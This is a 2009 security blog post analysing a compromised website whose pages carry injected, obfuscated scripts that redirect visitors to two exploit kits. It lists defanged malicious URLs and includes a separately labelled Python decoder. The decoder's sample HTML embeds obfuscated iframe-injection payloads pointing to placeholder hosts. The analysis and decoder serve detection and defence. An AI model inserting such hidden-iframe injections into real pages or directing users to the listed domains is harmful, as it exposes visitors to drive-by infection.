Monday, April 20, 2009

Scripting attack II. Combining crimeware kits for increased infection

Another technique widely used by cyber-criminals to attack computers through web scripting is the injection of malicious instructions into the code of a legitimate page.

In this case, a website hosted on a compromised server is used as a vector for spreading malware by exploiting vulnerabilities in unprotected computers. Some of the pages used are:

http://team-sleep.by .ru/default2 .html
http://team-sleep.by .ru/demo .html
http://team-sleep.by .ru/disco .html
http://team-sleep.by .ru/downloads .html
http://team-sleep.by .ru/enter .html
http://team-sleep.by .ru/gold .html
http://team-sleep.by .ru/googleanalyticsru .html
http://team-sleep.by .ru/guest .html
http://team-sleep.by .ru/guestbook .html
http://team-sleep.by .ru/media .html
http://team-sleep.by .ru/menu .html
http://team-sleep.by .ru/news .html
http://team-sleep.by .ru/photo2 .html
http://team-sleep.by .ru/poem .html
http://team-sleep.by .ru/press_reviews .html
http://team-sleep.by .ru/team-sleep .html
http://team-sleep.by .ru/wallpapers .html
http://team-sleep.by .ru/gmail .php
http://team-sleep.by .ru/haitou .php
http://team-sleep.by .ru/in .php
http://team-sleep.by .ru/xxx .php
http://team-sleep.by .ru/photo/team .html
http://team-sleep.by .ru/photo/wallz .html
http://team-sleep.by .ru/photo/live/index2 .html
http://team-sleep.by .ru/photo/live/imagepages/image1 .html
http://team-sleep.by .ru/photo/members/imagepages/image1 .html
http://team-sleep.by .ru/photo/team/imagepages/image1 .html


The list is long (98 pages on the site), but the graph shows all of them.

Each of these web addresses is disseminated through channels such as email or instant messaging clients using social engineering, and each page hosts several different scripts containing obfuscated exploits.

Decoding the scripts, we find iframe tags that redirect to other URLs, such as:
  • http://5rublei .com/unique/index .php
  • http://tochtonenado .com/yes/index .php
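The post says the injected scripts were obfuscated and, once decoded, turned out to write iframes pointing at the exploit-kit URLs. The following is an added example, not code from the original post: a small static triage script that peels the encodings most common in such injections at the time (a percent-encoded string passed to unescape(), String.fromCharCode() sequences, and \xHH escapes), repeats until nothing more decodes, and reports every iframe the decoded code would write, flagging the zero- or one-pixel ones. The sample page, the hostnames kit-a.example and kit-b.example, and the function names are constructed for this example; they are not the domains listed above.

```python
"""Static triage of injected <script> blocks: peel common JavaScript obfuscation
layers and pull out the iframe redirects they write into the page."""
import re
from urllib.parse import unquote

# Constructed sample page (not material from the post): the site's own harmless
# scripts plus two injected ones. Kit hostnames are placeholders.
SAMPLE_HTML = """<html><head><title>team photos</title>
<script src="/js/menu.js"></script>
<script>var year = new Date().getFullYear();</script>
</head><body>
<!-- one layer: percent-encoded tag written via unescape() -->
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Fkit-a.example%2Funique%2Findex.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E"));</script>
<!-- two layers: unescape() hides a String.fromCharCode() payload -->
<script>eval(unescape("document.write%28String.fromCharCode%2860,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,107,105,116,45,98,46,101,120,97,109,112,108,101,47,121,101,115,47,105,110,100,101,120,46,112,104,112,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,62,60,47,105,102,114,97,109,101,62%29%29"));</script>
<p>photo gallery</p></body></html>"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]+)\)")
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# 0/1-pixel frames or CSS-hidden frames are the usual drive-by giveaway.
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*['\"]?[01]\b|visibility\s*:\s*hidden|display\s*:\s*none", re.I)


def peel_layer(js: str) -> str:
    """Undo one layer of encoding. fromCharCode is tried first, so a payload that
    is itself hidden inside unescape() only resolves on the next pass."""
    js = FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()), js)
    js = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), js)
    js = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return js


def peel(js: str, max_layers: int = 8):
    """Repeat peel_layer until a fixed point. Returns (decoded_text, layers_removed)."""
    for layers in range(max_layers):
        nxt = peel_layer(js)
        if nxt == js:
            return js, layers
        js = nxt
    return js, max_layers


def extract_iframes(html: str):
    """Decode every <script> body and list the iframes it would write."""
    findings = []
    for script in SCRIPT_RE.findall(html):
        decoded, layers = peel(script)
        for tag in IFRAME_RE.findall(decoded):
            src = SRC_RE.search(tag)
            findings.append({
                "src": src.group(1) if src else None,
                "hidden": bool(HIDDEN_RE.search(tag)),
                "layers": layers,
            })
    return findings


if __name__ == "__main__":
    for f in extract_iframes(SAMPLE_HTML):
        flag = "HIDDEN" if f["hidden"] else "visible"
        print(f"{flag:8} layers={f['layers']} -> {f['src']}")
```

Pattern-based peeling like this only handles encodings it knows about; anything that computes the iframe string at run time (arithmetic on char codes, string reversal, keyed XOR) should be handed to a real JavaScript interpreter instead, with document.write and eval hooked to log their arguments.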
A very interesting point in relation to crimeware concerns the concept of vulnerability itself: crimeware is not exempt from weaknesses caused by design flaws in its own code, which lets us learn a little more about these kits by compromising their integrity.

As the picture shows, this appears to be the work of two known crimeware kits, Unique Sploits Pack and YES Exploit System.

This shows that cyber-criminals are constantly looking for quick and simple ways, the more automated the better, to combine different forms of attack and increase their profits.

In this way, the "professionals" behind this malware, with the botmaster as the main actor, seek to widen the range of infections and manage their harmful activities over a greater flow of distribution.

Related Information
Scripting attack. Exploitation of multiple vulnerabilities - Spanish version
Exploitation of vulnerabilities through PDFs - Spanish version
Exploiting vulnerabilities through SWF - Spanish version
Exploitation of vulnerabilities through JS - Spanish version
Analysis of an attack of web-based malware - Spanish version
LuckySploit, the right hand of Zeus - Spanish version
Massive exploitation of vulnerabilities through ghost servers - Spanish version


# Jorge Mieres
